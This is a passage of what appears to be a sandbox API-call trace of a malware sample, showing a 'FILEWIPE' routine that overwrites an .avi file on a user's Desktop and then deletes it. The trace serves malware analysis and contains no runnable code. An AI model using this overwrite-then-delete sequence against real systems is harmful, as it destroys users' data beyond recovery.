lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.396] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.396] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.396] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.397] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.397] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.397] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0031.397] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.397] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.397] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0031.398] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0031.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0031.398] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x54c02d10, ftLastWriteTime.dwHighDateTime=0x1d5b9fe, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x0, dwReserved1=0x777648, cFileName="b9ol1.avi", cAlternateFileName="")) returned 0x7c2100 [0031.399] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.399] CharLowerBuffW (in: lpsz="byte[42773]", cchLength=0xb | out: lpsz="byte[42773]") returned 0xb [0031.399] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.400] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.400] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.400] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.401] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.401] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0031.401] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.401] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\b9ol1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0031.402] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.404] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.404] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.404] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.404] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0031.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0031.405] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.405] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.405] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", lpFilePart=0x0) returned 0x50 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c55e8 [0031.406] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\b9ol1.avi")) returned 0x20 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5810 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5810 | out: hHeap=0x770000) returned 1 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0031.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0031.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0031.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.407] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x1299ee80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="b9ol1.avi", cAlternateFileName="")) returned 0x7c2100 [0031.407] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\b9ol1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\b9ol1.avi")) returned 1 [0031.408] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2324de0, ftCreationTime.dwHighDateTime=0x1d5baf6, ftLastAccessTime.dwLowDateTime=0x54c02d10, ftLastAccessTime.dwHighDateTime=0x1d5b9fe, ftLastWriteTime.dwLowDateTime=0x1299ee80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xa715, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="b9ol1.avi", cAlternateFileName="")) returned 0 [0031.408] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c55e8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0031.408] HeapFree (in: hHeap=0x770000, 